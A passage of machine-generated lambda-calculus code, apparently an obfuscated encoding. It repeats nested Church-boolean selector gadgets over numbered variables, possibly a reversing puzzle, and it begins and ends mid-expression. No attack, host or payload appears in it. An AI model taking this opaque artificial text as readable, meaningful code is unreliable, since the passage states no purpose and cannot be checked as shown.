s_132 lambda s_179 lambda s_42 ((132)(42))(179))(88)))(118)))(lambda s_0 lambda s_1 1))
(lambda s_228 lambda s_251 228))))(((lambda s_181 lambda s_127 ((lambda s_77 lambda
s_186 ((77)(77))(186))(((lambda s_59 lambda s_135 ((59)(135))(59))(127))((lambda s_254
lambda s_153 lambda s_56 ((254)(56))(153))(181))))(((lambda s_65 lambda s_253 ((65)
(253))(65))((lambda s_227 lambda s_117 lambda s_15 ((227)(15))(117))(127)))(181)))
(lambda s_1 lambda s_0 1))(lambda s_76 lambda s_158 158))))(((lambda s_161 lambda s_104
((lambda s_187 lambda s_160 ((187)(187))(160))(((lambda s_67 lambda s_207 ((67)(207))
(67))(104))((lambda s_180 lambda s_195 lambda s_199 ((180)(199))(195))(161))))(((lambda
s_155 lambda s_129 ((155)(129))(155))((lambda s_197 lambda s_239 lambda s_178 ((197)
(178))(239))(104)))(161)))(lambda s_0 lambda s_1 0))(lambda s_129 lambda s_3 3))))
(((lambda s_159 lambda s_97 ((lambda s_60 lambda s_153 ((60)(60))(153))(((lambda s_120
lambda s_47 ((120)(47))(120))(97))((lambda s_30 lambda s_216 lambda s_180 ((30)(180))
(216))(159))))(((lambda s_74 lambda s_132 ((74)(132))(74))((lambda s_0 lambda s_51
lambda s_37 ((0)(37))(51))(97)))(159)))(lambda s_0 lambda s_1 0))(lambda s_75 lambda
s_170 170))))(((lambda s_125 lambda s_21 ((lambda s_66 lambda s_199 ((66)(66))(199))
(((lambda s_36 lambda s_250 ((36)(250))(36))(21))((lambda s_85 lambda s_94 lambda s_18
((85)(18))(94))(125))))(((lambda s_240 lambda s_117 ((240)(117))(240))((lambda s_57
lambda s_252 lambda s_141 ((57)(141))(252))(21)))(125)))(lambda s_1 lambda s_0 1))
(lambda s_210 lambda s_99 99))))(((lambda s_254 lambda s_147 ((lambda s_100 lambda s_68
((100)(100))(68))(((lambda s_19 lambda s_198 ((19)(198))(19))(147))((lambda s_231
lambda s_34 lambda s_105 ((231)(105))(34))(254))))(((lambda s_216 lambda s_42 ((216)
(42))(216))((lambda s_230 lambda s_126 lambda s_129 ((230)(129))(126))(147)))(254)))
(lambda s_0 lambda s_1 0))(lambda s_11 lambda s_178 178))))(((lambda s_221 lambda s_140
((lambda s_53 lambda s_89 ((53)(53))(89))(((lambda s_18 lambda s_24 ((18)(24))(18))
(140))((lambda s_140 lambda s_211 lambda s_233 ((140)(233))(211))(221))))(((lambda
s_166 lambda s_131 ((166)(131))(166))((lambda s_32 lambda s_212 lambda s_91 ((32)(91))
(212))(140)))(221)))(lambda s_0 lambda s_1 1))(lambda s_195 lambda s_238 195))))
(((lambda s_212 lambda s_249 ((lambda s_254 lambda s_164 ((254)(254))(164))(((lambda
s_104 lambda s_33 ((104)(33))(104))(249))((lambda s_142 lambda s_35 lambda s_63 ((142)
(63))(35))(212))))(((lambda s_23 lambda s_174 ((23)(174))(23))((lambda s_28 lambda
s_253 lambda s_53 ((28)(53))(253))(249)))(212)))(lambda s_1 lambda s_0 1))(lambda s_171
lambda s_138 138))))(((lambda s_168 lambda s_242 ((lambda s_127 lambda s_11 ((127)
(127))(11))(((lambda s_122 lambda s_136 ((122)(136))(122))(242))((lambda s_59 lambda
s_55 lambda s_211 ((59)(211))(55))(168))))(((lambda s_59 lambda s_137 ((59)(137))(59))
((lambda s_139 lambda s_92 lambda s_2 ((139)(2))(92))(242)))(168)))(lambda s_0 lambda
s_1 0))(lambda s_212 lambda s_205 205))))(((lambda s_18 lambda s_151 ((lambda s_157
lambda s_103 ((157)(157))(103))(((lambda s_132 lambda s_54 ((132)(54))(132))(151))
((lambda s_129 lambda s_248 lambda s_166 ((129)(166))(248))(18))))(((lambda s_242
lambda s_228 ((242)(228))(242))((lambda s_132 lambda s_60 lambda s_28 ((132)(28))(60))
(151)))(18)))(lambda s_1 lambda s_0 0))(lambda s_76 lambda s_179 76))))(((lambda s_243
lambda s_135 ((lambda s_196 lambda s_199 ((196)(196))(199))(((lambda s_140 lambda s_97
((140)(97))(140))(135))((lambda s_4 lambda s_155 lambda s_158 ((4)(158))(155))(243))))
(((lambda s_24 lambda s_108 ((24)(108))(24))((lambda s_53 lambda s_229 lambda s_245
((53)(245))(229))(135)))(243)))(lambda s_1 lambda s_0 1))(lambda s_239 lambda s_142
142))))(((lambda s_140 lambda s_210 ((lambda s_207 lambda s_203 ((207)(207))(203))
(((lambda s_168 lambda s_145 ((168)(145))(168))(210))((lambda s_150 lambda s_129 lambda
s_188 ((150)(188))(129))(140))))(((lambda s_182 lambda s_94 ((182)(94))(182))((lambda
s_185 lambda s_221 lambda s_159 ((185)(159))(221))(210)))(140)))(lambda s_0 lambda s_1
0))(lambda s_49 lambda s_216 216))))(((lambda s_2 lambda s_104 ((lambda s_6 lambda s_78
((6)(6))(78))(((lambda s_93 lambda s_57 ((93)(57))(93))(104))((lambda s_38 lambda s_215
lambda s_217 ((38)(217))(215))(2))))(((lambda s_58 lambda s_158 ((58)(158))(58))
((lambda s_53 lambda s_221 lambda s_88 ((53)(88))(221))(104)))(2)))(lambda s_1 lambda
s_0 0))(lambda s_130 lambda s_10 130))))(((lambda s_240 lambda s_0 ((lambda s_109
lambda s_69 ((109)(109))(69))(((lambda s_246 lambda s_149 ((246)(149))(246))(0))
((lambda s_196 lambda s_33 lambda s_189 ((196)(189))(33))(240))))(((lambda s_191 lambda
s_242 ((191)(242))(191))((lambda s_217 lambda s_157 lambda s_98 ((217)(98))(157))(0)))
(240)))(lambda s_0 lambda s_1 0))(lambda s_96 lambda s_176 176))))(((lambda s_170
lambda s_109 ((lambda s_183 lambda s_136 ((183)(183))(136))(((lambda s_107 lambda s_7
((107)(7))(107))(109))((lambda s_205 lambda s_152 lambda s_130 ((205)(130))(152))
(170))))(((lambda s_32 lambda s_230 ((32)(230))(32))((lambda s_210 lambda s_33 lambda
s_52 ((210)(52))(33))(109)))(170)))(lambda s_1 lambda s_0 0))(lambda s_219 lambda s_123
219))))(((lambda s_158 lambda s_102 ((lambda s_249 lambda s_88 ((249)(249))(88))
(((lambda s_93 lambda s_55 ((93)(55))(93))(102))((lambda s_151 lambda s_184 lambda
s_225 ((151)(225))(184))(158))))(((lambda s_181 lambda s_124 ((181)(124))(181))((lambda
s_65 lambda s_134 lambda s_208 ((65)(208))(134))(102)))(158)))(lambda s_0 lambda s_1
0))(lambda s_37 lambda s_151 151))))(((lambda s_177 lambda s_133 ((lambda s_210 lambda
s_239 ((210)(210))(239))(((lambda s_202 lambda s_34 ((202)(34))(202))(133))((lambda
s_231 lambda s_193 lambda s_35 ((231)(35))(193))(177))))(((lambda s_187 lambda s_73
((187)(73))(187))((lambda s_168 lambda s_165 lambda s_102 ((168)(102))(165))(133)))
(177)))(lambda s_1 lambda s_0 1))(lambda s_73 lambda s_1 1))))(((lambda s_144 lambda
s_175 ((lambda s_105 lambda s_73 ((105)(105))(73))(((lambda s_15 lambda s_13 ((15)(13))
(15))(175))((lambda s_135 lambda s_80 lambda s_172 ((135)(172))(80))(144))))(((lambda
s_116 lambda s_189 ((116)(189))(116))((lambda s_167 lambda s_91 lambda s_109 ((167)
(109))(91))(175)))(144)))(lambda s_0 lambda s_1 1))(lambda s_8 lambda s_88 8))))
(((lambda s_99 lambda s_169 ((lambda s_250 lambda s_18 ((250)(250))(18))(((lambda s_172
lambda s_207 ((172)(207))(172))(169))((lambda s_50 lambda s_99 lambda s_27 ((50)(27))
(99))(99))))(((lambda s_60 lambda s_8 ((60)(8))(60))((lambda s_21 lambda s_27 lambda
s_153 ((21)(153))(27))(169)))(99)))(lambda s_1 lambda s_0 1))(lambda s_139 lambda s_28
28))))(((lambda s_98 lambda s_28 ((lambda s_154 lambda s_184 ((154)(154))(184))
(((lambda s_205 lambda s_93 ((205)(93))(205))(28))((lambda s_211 lambda s_11 lambda
s_213 ((211)(213))(11))(98))))(((lambda s_40 lambda s_164 ((40)(164))(40))((lambda s_0
lambda s_150 lambda s_199 ((0)(199))(150))(28)))(98)))(lambda s_0 lambda s_1 0))(lambda
s_190 lambda s_73 73))))(((lambda s_85 lambda s_103 ((lambda s_81 lambda s_141 ((81)
(81))(141))(((lambda s_97 lambda s_96 ((97)(96))(97))(103))((lambda s_94 lambda s_196
lambda s_152 ((94)(152))(196))(85))))(((lambda s_100 lambda s_119 ((100)(119))(100))
((lambda s_180 lambda s_164 lambda s_156 ((180)(156))(164))(103)))(85)))(lambda s_0
lambda s_1 0))(lambda s_92 lambda s_130 130))))(((lambda s_110 lambda s_99 ((lambda
s_87 lambda s_103 ((87)(87))(103))(((lambda s_200 lambda s_242 ((200)(242))(200))(99))
((lambda s_1 lambda s_220 lambda s_199 ((1)(199))(220))(110))))(((lambda s_173 lambda
s_220 ((173)(220))(173))((lambda s_54 lambda s_48 lambda s_135 ((54)(135))(48))(99)))
(110)))(lambda s_0 lambda s_1 0))(lambda s_9 lambda s_69 69))))(((lambda s_97 lambda
s_55 ((lambda s_50 lambda s_121 ((50)(50))(121))(((lambda s_169 lambda s_84 ((169)(84))
(169))(55))((lambda s_171 lambda s_9 lambda s_165 ((171)(165))(9))(97))))(((lambda
s_124 lambda s_183 ((124)(183))(124))((lambda s_111 lambda s_123 lambda s_144 ((111)
(144))(123))(55)))(97)))(lambda s_0 lambda s_1 1))(lambda s_169 lambda s_46 169))))
(((lambda s_21 lambda s_66 ((lambda s_140 lambda s_135 ((140)(140))(135))(((lambda
s_141 lambda s_41 ((141)(41))(141))(66))((lambda s_4 lambda s_116 lambda s_49 ((4)(49))
(116))(21))))(((lambda s_251 lambda s_16 ((251)(16))(251))((lambda s_255 lambda s_182
lambda s_41 ((255)(41))(182))(66)))(21)))(lambda s_0 lambda s_1 1))(lambda s_18 lambda
s_172 18))))(((lambda s_50 lambda s_121 ((lambda s_71 lambda s_184 ((71)(71))(184))
(((lambda s_1 lambda s_2 ((1)(2))(1))(121))((lambda s_148 lambda s_232 lambda s_46
((148)(46))(232))(50))))(((lambda s_137 lambda s_29 ((137)(29))(137))((lambda s_165
lambda s_11 lambda s_194 ((165)(194))(11))(121)))(50)))(lambda s_0 lambda s_1 0))
(lambda s_88 lambda s_15 15))))(((lambda s_84 lambda s_183 ((lambda s_203 lambda s_138
((203)(203))(138))(((lambda s_208 lambda s_93 ((208)(93))(208))(183))((lambda s_49
lambda s_129 lambda s_126 ((49)(126))(129))(84))))(((lambda s_25 lambda s_148 ((25)
(148))(25))((lambda s_26 lambda s_146 lambda s_99 ((26)(99))(146))(183)))(84)))(lambda
s_0 lambda s_1 0))(lambda s_3 lambda s_163 163))))(((lambda s_163 lambda s_186 ((lambda
s_91 lambda s_150 ((91)(91))(150))(((lambda s_144 lambda s_170 ((144)(170))(144))(186))
((lambda s_114 lambda s_36 lambda s_229 ((114)(229))(36))(163))))(((lambda s_38 lambda
s_175 ((38)(175))(38))((lambda s_110 lambda s_255 lambda s_52 ((110)(52))(255))(186)))
(163)))(lambda s_0 lambda s_1 1))(lambda s_168 lambda s_52 168))))(((lambda s_33 lambda
s_188 ((lambda s_77 lambda s_240 ((77)(77))(240))(((lambda s_74 lambda s_40 ((74)(40))
(74))(188))((lambda s_150 lambda s_29 lambda s_168 ((150)(168))(29))(33))))(((lambda
s_202 lambda s_178 ((202)(178))(202))((lambda s_142 lambda s_87 lambda s_118 ((142)
(118))(87))(188)))(33)))(lambda s_1 lambda s_0 0))(lambda s_220 lambda s_242 220))))
(((lambda s_89 lambda s_255 ((lambda s_0 lambda s_163 ((0)(0))(163))(((lambda s_155
lambda s_224 ((155)(224))(155))(255))((lambda s_243 lambda s_30 lambda s_248 ((243)
(248))(30))(89))))(((lambda s_239 lambda s_90 ((239)(90))(239))((lambda s_131 lambda
s_61 lambda s_174 ((131)(174))(61))(255)))(89)))(lambda s_1 lambda s_0 1))(lambda s_97
lambda s_74 74))))(((lambda s_62 lambda s_68 ((lambda s_254 lambda s_100 ((254)(254))
(100))(((lambda s_101 lambda s_184 ((101)(184))(101))(68))((lambda s_241 lambda s_143
lambda s_54 ((241)(54))(143))(62))))(((lambda s_215 lambda s_177 ((215)(177))(215))
((lambda s_36 lambda s_176 lambda s_35 ((36)(35))(176))(68)))(62)))(lambda s_1 lambda
s_0 1))(lambda s_6 lambda s_135 135))))(((lambda s_89 lambda s_98 ((lambda s_80 lambda
s_117 ((80)(80))(117))(((lambda s_97 lambda s_202 ((97)(202))(97))(98))((lambda s_241
lambda s_24 lambda s_113 ((241)(113))(24))(89))))(((lambda s_59 lambda s_193 ((59)
(193))(59))((lambda s_208 lambda s_94 lambda s_162 ((208)(162))(94))(98)))(89)))(lambda
s_1 lambda s_0 0))(lambda s_255 lambda s_70 255))))(((lambda s_27 lambda s_150 ((lambda
s_165 lambda s_113 ((165)(165))(113))(((lambda s_219 lambda s_87 ((219)(87))(219))
(150))((lambda s_98 lambda s_63 lambda s_124 ((98)(124))(63))(27))))(((lambda s_204
lambda s_241 ((204)(241))(204))((lambda s_31 lambda s_47 lambda s_58 ((31)(58))(47))
(150)))(27)))(lambda s_0 lambda s_1 0))(lambda s_172 lambda s_144 144))))(((lambda s_92
lambda s_197 ((lambda s_93 lambda s_218 ((93)(93))(218))(((lambda s_176 lambda s_247
((176)(247))(176))(197))((lambda s_129 lambda s_26 lambda s_97 ((129)(97))(26))(92))))
(((lambda s_136 lambda s_15 ((136)(15))(136))((lambda s_67 lambda s_230 lambda s_26
((67)(26))(230))(197)))(92)))(lambda s_1 lambda s_0 1))(lambda s_243 lambda s_224
224))))(((lambda s_86 lambda s_85 ((lambda s_131 lambda s_193 ((131)(131))(193))
(((lambda s_210 lambda s_218 ((210)(218))(210))(85))((lambda s_238 lambda s_19 lambda
s_207 ((238)(207))(19))(86))))(((lambda s_60 lambda s_120 ((60)(120))(60))((lambda
s_211 lambda s_189 lambda s_190 ((211)(190))(189))(85)))(86)))(lambda s_0 lambda s_1
1))(lambda s_234 lambda s_224 234))))(((lambda s_166 lambda s_203 ((lambda s_27 lambda
s_217 ((27)(27))(217))(((lambda s_5 lambda s_73 ((5)(73))(5))(203))((lambda s_237
lambda s_241 lambda s_200 ((237)(200))(241))(166))))(((lambda s_18 lambda s_57 ((18)
(57))(18))((lambda s_153 lambda s_105 lambda s_21 ((153)(21))(105))(203)))(166)))
(lambda s_0 lambda s_1 0))(lambda s_108 lambda s_67 67))))(((lambda s_40 lambda s_169
((lambda s_12 lambda s_146 ((12)(12))(146))(((lambda s_58 lambda s_32 ((58)(32))(58))
(169))((lambda s_17 lambda s_61 lambda s_220 ((17)(220))(61))(40))))(((lambda s_78
lambda s_138 ((78)(138))(78))((lambda s_145 lambda s_208 lambda s_52 ((145)(52))(208))
(169)))(40)))(lambda s_1 lambda s_0 0))(lambda s_1 lambda s_143 1))))(((lambda s_140
lambda s_19 ((lambda s_191 lambda s_101 ((191)(191))(101))(((lambda s_81 lambda s_203
((81)(203))(81))(19))((lambda s_5 lambda s_23 lambda s_167 ((5)(167))(23))(140))))
(((lambda s_1 lambda s_231 ((1)(231))(1))((lambda s_133 lambda s_38 lambda s_9 ((133)
(9))(38))(19)))(140)))(lambda s_0 lambda s_1 1))(lambda s_144 lambda s_52 144))))
(((lambda s_202 lambda s_68 ((lambda s_30 lambda s_144 ((30)(30))(144))(((lambda s_49
lambda s_88 ((49)(88))(49))(68))((lambda s_66 lambda s_15 lambda s_73 ((66)(73))(15))
(202))))(((lambda s_45 lambda s_222 ((45)(222))(45))((lambda s_167 lambda s_131 lambda
s_197 ((167)(197))(131))(68)))(202)))(lambda s_0 lambda s_1 1))(lambda s_173 lambda
s_122 173))))(((lambda s_115 lambda s_244 ((lambda s_165 lambda s_149 ((165)(165))
(149))(((lambda s_198 lambda s_3 ((198)(3))(198))(244))((lambda s_202 lambda s_231
lambda s_210 ((202)(210))(231))(115))))(((lambda s_112 lambda s_56 ((112)(56))(112))
((lambda s_167 lambda s_19 lambda s_166 ((167)(166))(19))(244)))(115)))(lambda s_1
lambda s_0 0))(lambda s_216 lambda s_50 216))))(((lambda s_52 lambda s_255 ((lambda
s_194 lambda s_60 ((194)(194))(60))(((lambda s_155 lambda s_121 ((155)(121))(155))
(255))((lambda s_43 lambda s_79 lambda s_52 ((43)(52))(79))(52))))(((lambda s_93 lambda
s_171 ((93)(171))(93))((lambda s_14 lambda s_87 lambda s_137 ((14)(137))(87))(255)))
(52)))(lambda s_1 lambda s_0 0))(lambda s_124 lambda s_139 124))))(((lambda s_119
lambda s_201 ((lambda s_112 lambda s_136 ((112)(112))(136))(((lambda s_51 lambda s_74
((51)(74))(51))(201))((lambda s_41 lambda s_110 lambda s_72 ((41)(72))(110))(119))))
(((lambda s_54 lambda s_18 ((54)(18))(54))((lambda s_168 lambda s_98 lambda s_130
((168)(130))(98))(201)))(119)))(lambda s_1 lambda s_0 1))(lambda s_92 lambda s_60
60))))(((lambda s_214 lambda s_179 ((lambda s_133 lambda s_230 ((133)(133))(230))
(((lambda s_206 lambda s_100 ((206)(100))(206))(179))((lambda s_40 lambda s_214 lambda
s_120 ((40)(120))(214))(214))))(((lambda s_64 lambda s_251 ((64)(251))(64))((lambda
s_20 lambda s_237 lambda s_140 ((20)(140))(237))(179)))(214)))(lambda s_1 lambda s_0
1))(lambda s_216 lambda s_237 237))))(((lambda s_78 lambda s_21 ((lambda s_20 lambda
s_152 ((20)(20))(152))(((lambda s_250 lambda s_42 ((250)(42))(250))(21))((lambda s_239
lambda s_252 lambda s_165 ((239)(165))(252))(78))))(((lambda s_141 lambda s_99 ((141)
(99))(141))((lambda s_173 lambda s_201 lambda s_92 ((173)(92))(201))(21)))(78)))(lambda
s_0 lambda s_1 0))(lambda s_103 lambda s_241 241))))(((lambda s_10 lambda s_169
((lambda s_93 lambda s_59 ((93)(93))(59))(((lambda s_104 lambda s_119 ((104)(119))
(104))(169))((lambda s_53 lambda s_202 lambda s_48 ((53)(48))(202))(10))))(((lambda
s_183 lambda s_242 ((183)(242))(183))((lambda s_111 lambda s_219 lambda s_248 ((111)
(248))(219))(169)))(10)))(lambda s_1 lambda s_0 0))(lambda s_92 lambda s_243 92))))
(((lambda s_28 lambda s_215 ((lambda s_161 lambda s_170 ((161)(161))(170))(((lambda
s_158 lambda s_174 ((158)(174))(158))(215))((lambda s_148 lambda s_25 lambda s_211
((148)(211))(25))(28))))(((lambda s_236 lambda s_156 ((236)(156))(236))((lambda s_14
lambda s_103 lambda s_223 ((14)(223))(103))(215)))(28)))(lambda s_0 lambda s_1 1))
(lambda s_16 lambda s_204 16))))(((lambda s_38 lambda s_211 ((lambda s_39 lambda s_22
((39)(39))(22))(((lambda s_232 lambda s_53 ((232)(53))(232))(211))((lambda s_196 lambda
s_82 lambda s_201 ((196)(201))(82))(38))))(((lambda s_171 lambda s_79 ((171)(79))(171))
((lambda s_37 lambda s_162 lambda s_246 ((37)(246))(162))(211)))(38)))(lambda s_0
lambda s_1 0))(lambda s_76 lambda s_209 209))))(((lambda s_223 lambda s_202 ((lambda
s_139 lambda s_212 ((139)(139))(212))(((lambda s_43 lambda s_136 ((43)(136))(43))(202))
((lambda s_39 lambda s_73 lambda s_183 ((39)(183))(73))(223))))(((lambda s_15 lambda
s_75 ((15)(75))(15))((lambda s_84 lambda s_24 lambda s_171 ((84)(171))(24))(202)))
(223)))(lambda s_0 lambda s_1 1))(lambda s_15 lambda s_98 15))))(((lambda s_244 lambda
s_46 ((lambda s_153 lambda s_222 ((153)(153))(222))(((lambda s_116 lambda s_65 ((116)
(65))(116))(46))((lambda s_49 lambda s_44 lambda s_102 ((49)(102))(44))(244))))
(((lambda s_102 lambda s_1 ((102)(1))(102))((lambda s_245 lambda s_109 lambda s_107
((245)(107))(109))(46)))(244)))(lambda s_1 lambda s_0 1))(lambda s_47 lambda s_87
87))))(((lambda s_235 lambda s_95 ((lambda s_111 lambda s_73 ((111)(111))(73))(((lambda
s_52 lambda s_12 ((52)(12))(52))(95))((lambda s_49 lambda s_16 lambda s_55 ((49)(55))
(16))(235))))(((lambda s_86 lambda s_15 ((86)(15))(86))((lambda s_127 lambda s_8 lambda
s_23 ((127)(23))(8))(95)))(235)))(lambda s_0 lambda s_1 0))(lambda s_184 lambda s_190
190))))(((lambda s_30 lambda s_138 ((lambda s_80 lambda s_202 ((80)(80))(202))(((lambda
s_228 lambda s_144 ((228)(144))(228))(138))((lambda s_237 lambda s_210 lambda s_108
((237)(108))(210))(30))))(((lambda s_53 lambda s_46 ((53)(46))(53))((lambda s_42 lambda
s_39 lambda s_1 ((42)(1))(39))(138)))(30)))(lambda s_0 lambda s_1 1))(lambda s_171
lambda s_43 171))))(((lambda s_230 lambda s_102 ((lambda s_161 lambda s_196 ((161)
(161))(196))(((lambda s_250 lambda s_228 ((250)(228))(250))(102))((lambda s_242 lambda
s_199 lambda s_5 ((242)(5))(199))(230))))(((lambda s_59 lambda s_129 ((59)(129))(59))
((lambda s_185 lambda s_5 lambda s_74 ((185)(74))(5))(102)))(230)))(lambda s_0 lambda
s_1 1))(lambda s_27 lambda s_180 27))))(((lambda s_179 lambda s_115 ((lambda s_253
lambda s_174 ((253)(253))(174))(((lambda s_55 lambda s_70 ((55)(70))(55))(115))((lambda
s_13 lambda s_114 lambda s_33 ((13)(33))(114))(179))))(((lambda s_12 lambda s_45 ((12)
(45))(12))((lambda s_86 lambda s_69 lambda s_211 ((86)(211))(69))(115)))(179)))(lambda
s_0 lambda s_1 0))(lambda s_173 lambda s_103 103))))(((lambda s_117 lambda s_209
((lambda s_221 lambda s_231 ((221)(221))(231))(((lambda s_250 lambda s_224 ((250)(224))
(250))(209))((lambda s_133 lambda s_17 lambda s_86 ((133)(86))(17))(117))))(((lambda
s_132 lambda s_31 ((132)(31))(132))((lambda s_153 lambda s_156 lambda s_21 ((153)(21))
(156))(209)))(117)))(lambda s_0 lambda s_1 1))(lambda s_37 lambda s_62 37))))(((lambda
s_152 lambda s_225 ((lambda s_151 lambda s_37 ((151)(151))(37))(((lambda s_34 lambda
s_99 ((34)(99))(34))(225))((lambda s_152 lambda s_30 lambda s_47 ((152)(47))(30))
(152))))(((lambda s_113 lambda s_92 ((113)(92))(113))((lambda s_246 lambda s_51 lambda
s_176 ((246)(176))(51))(225)))(152)))(lambda s_0 lambda s_1 0))(lambda s_30 lambda s_23
23))))(((lambda s_211 lambda s_154 ((lambda s_188 lambda s_68 ((188)(188))(68))
(((lambda s_249 lambda s_22 ((249)(22))(249))(154))((lambda s_125 lambda s_67 lambda
s_26 ((125)(26))(67))(211))))(((lambda s_36 lambda s_220 ((36)(220))(36))((lambda s_137
lambda s_156 lambda s_114 ((137)(114))(156))(154)))(211)))(lambda s_0 lambda s_1 1))
(lambda s_142 lambda s_124 142))))(((lambda s_170 lambda s_204 ((lambda s_73 lambda
s_56 ((73)(73))(56))(((lambda s_123 lambda s_199 ((123)(199))(123))(204))((lambda s_14
lambda s_45 lambda s_9 ((14)(9))(45))(170))))(((lambda s_198 lambda s_206 ((198)(206))
(198))((lambda s_134 lambda s_53 lambda s_222 ((134)(222))(53))(204)))(170)))(lambda
s_0 lambda s_1 0))(lambda s_12 lambda s_20 20))))(((lambda s_34 lambda s_166 ((lambda
s_134 lambda s_208 ((134)(134))(208))(((lambda s_209 lambda s_161 ((209)(161))(209))
(166))((lambda s_200 lambda s_206 lambda s_24 ((200)(24))(206))(34))))(((lambda s_166
lambda s_150 ((166)(150))(166))((lambda s_176 lambda s_243 lambda s_144 ((176)(144))
(243))(166)))(34)))(lambda s_0 lambda s_1 0))(lambda s_85 lambda s_20 20))))(((lambda
s_88 lambda s_69 ((lambda s_241 lambda s_37 ((241)(241))(37))(((lambda s_159 lambda
s_170 ((159)(170))(159))(69))((lambda s_180 lambda s_105 lambda s_215 ((180)(215))
(105))(88))))(((lambda s_134 lambda s_119 ((134)(119))(134))((lambda s_100 lambda s_156
lambda s_234 ((100)(234))(156))(69)))(88)))(lambda s_0 lambda s_1 0))(lambda s_39
lambda s_83 83))))(((lambda s_60 lambda s_247 ((lambda s_234 lambda s_238 ((234)(234))
(238))(((lambda s_128 lambda s_223 ((128)(223))(128))(247))((lambda s_183 lambda s_113
lambda s_236 ((183)(236))(113))(60))))(((lambda s_94 lambda s_101 ((94)(101))(94))
((lambda s_126 lambda s_10 lambda s_9 ((126)(9))(10))(247)))(60)))(lambda s_1 lambda
s_0 1))(lambda s_143 lambda s_15 15))))(((lambda s_213 lambda s_154 ((lambda s_19
lambda s_47 ((19)(19))(47))(((lambda s_24 lambda s_217 ((24)(217))(24))(154))((lambda
s_63 lambda s_99 lambda s_73 ((63)(73))(99))(213))))(((lambda s_250 lambda s_92 ((250)
(92))(250))((lambda s_181 lambda s_142 lambda s_2 ((181)(2))(142))(154)))(213)))(lambda
s_1 lambda s_0 0))(lambda s_148 lambda s_102 148))))(((lambda s_210 lambda s_237
((lambda s_163 lambda s_81 ((163)(163))(81))(((lambda s_200 lambda s_175 ((200)(175))
(200))(237))((lambda s_132 lambda s_11 lambda s_149 ((132)(149))(11))(210))))(((lambda
s_150 lambda s_185 ((150)(185))(150))((lambda s_110 lambda s_30 lambda s_82 ((110)(82))
(30))(237)))(210)))(lambda s_1 lambda s_0 0))(lambda s_200 lambda s_102 200))))
(((lambda s_126 lambda s_153 ((lambda s_155 lambda s_158 ((155)(155))(158))(((lambda
s_125 lambda s_238 ((125)(238))(125))(153))((lambda s_220 lambda s_96 lambda s_5 ((220)
(5))(96))(126))))(((lambda s_141 lambda s_66 ((141)(66))(141))((lambda s_162 lambda
s_21 lambda s_73 ((162)(73))(21))(153)))(126)))(lambda s_0 lambda s_1 1))(lambda s_204
lambda s_128 204))))(((lambda s_167 lambda s_95 ((lambda s_232 lambda s_214 ((232)
(232))(214))(((lambda s_105 lambda s_240 ((105)(240))(105))(95))((lambda s_34 lambda
s_108 lambda s_36 ((34)(36))(108))(167))))(((lambda s_179 lambda s_170 ((179)(170))
(179))((lambda s_188 lambda s_113 lambda s_49 ((188)(49))(113))(95)))(167)))(lambda s_0
lambda s_1 1))(lambda s_32 lambda s_176 32))))(((lambda s_170 lambda s_205 ((lambda s_1
lambda s_58 ((1)(1))(58))(((lambda s_91 lambda s_70 ((91)(70))(91))(205))((lambda s_16
lambda s_66 lambda s_97 ((16)(97))(66))(170))))(((lambda s_62 lambda s_6 ((62)(6))(62))
((lambda s_39 lambda s_238 lambda s_125 ((39)(125))(238))(205)))(170)))(lambda s_1
lambda s_0 1))(lambda s_46 lambda s_111 111))))(((lambda s_75 lambda s_206 ((lambda
s_224 lambda s_250 ((224)(224))(250))(((lambda s_59 lambda s_27 ((59)(27))(59))(206))
((lambda s_93 lambda s_195 lambda s_220 ((93)(220))(195))(75))))(((lambda s_204 lambda
s_240 ((204)(240))(204))((lambda s_183 lambda s_147 lambda s_24 ((183)(24))(147))
(206)))(75)))(lambda s_1 lambda s_0 0))(lambda s_168 lambda s_50 168))))(((lambda s_28
lambda s_37 ((lambda s_167 lambda s_254 ((167)(167))(254))(((lambda s_37 lambda s_109
((37)(109))(37))(37))((lambda s_53 lambda s_94 lambda s_173 ((53)(173))(94))(28))))
(((lambda s_32 lambda s_78 ((32)(78))(32))((lambda s_143 lambda s_234 lambda s_64
((143)(64))(234))(37)))(28)))(lambda s_1 lambda s_0 1))(lambda s_34 lambda s_172
172))))(((lambda s_165 lambda s_102 ((lambda s_135 lambda s_240 ((135)(135))(240))
(((lambda s_94 lambda s_160 ((94)(160))(94))(102))((lambda s_227 lambda s_221 lambda
s_158 ((227)(158))(221))(165))))(((lambda s_72 lambda s_144 ((72)(144))(72))((lambda
s_142 lambda s_39 lambda s_179 ((142)(179))(39))(102)))(165)))(lambda s_0 lambda s_1
1))(lambda s_76 lambda s_222 76))))(((lambda s_117 lambda s_211 ((lambda s_121 lambda
s_218 ((121)(121))(218))(((lambda s_223 lambda s_190 ((223)(190))(223))(211))((lambda
s_34 lambda s_137 lambda s_245 ((34)(245))(137))(117))))(((lambda s_243 lambda s_181
((243)(181))(243))((lambda s_100 lambda s_238 lambda s_220 ((100)(220))(238))(211)))
(117)))(lambda s_0 lambda s_1 0))(lambda s_246 lambda s_205 205))))(((lambda s_75
lambda s_16 ((lambda s_169 lambda s_126 ((169)(169))(126))(((lambda s_203 lambda s_74
((203)(74))(203))(16))((lambda s_200 lambda s_108 lambda s_135 ((200)(135))(108))
(75))))(((lambda s_85 lambda s_195 ((85)(195))(85))((lambda s_46 lambda s_40 lambda
s_205 ((46)(205))(40))(16)))(75)))(lambda s_1 lambda s_0 1))(lambda s_7 lambda s_20
20))))(((lambda s_165 lambda s_112 ((lambda s_132 lambda s_163 ((132)(132))(163))
(((lambda s_138 lambda s_17 ((138)(17))(138))(112))((lambda s_162 lambda s_200 lambda
s_243 ((162)(243))(200))(165))))(((lambda s_35 lambda s_236 ((35)(236))(35))((lambda
s_9 lambda s_236 lambda s_111 ((9)(111))(236))(112)))(165)))(lambda s_1 lambda s_0 1))
(lambda s_82 lambda s_150 150))))(((lambda s_121 lambda s_231 ((lambda s_94 lambda s_84
((94)(94))(84))(((lambda s_127 lambda s_58 ((127)(58))(127))(231))((lambda s_184 lambda
s_143 lambda s_125 ((184)(125))(143))(121))))(((lambda s_249 lambda s_247 ((249)(247))
(249))((lambda s_59 lambda s_231 lambda s_30 ((59)(30))(231))(231)))(121)))(lambda s_0
lambda s_1 1))(lambda s_12 lambda s_146 12))))(((lambda s_218 lambda s_109 ((lambda
s_89 lambda s_126 ((89)(89))(126))(((lambda s_61 lambda s_17 ((61)(17))(61))(109))
((lambda s_123 lambda s_170 lambda s_122 ((123)(122))(170))(218))))(((lambda s_122
lambda s_130 ((122)(130))(122))((lambda s_113 lambda s_8 lambda s_33 ((113)(33))(8))
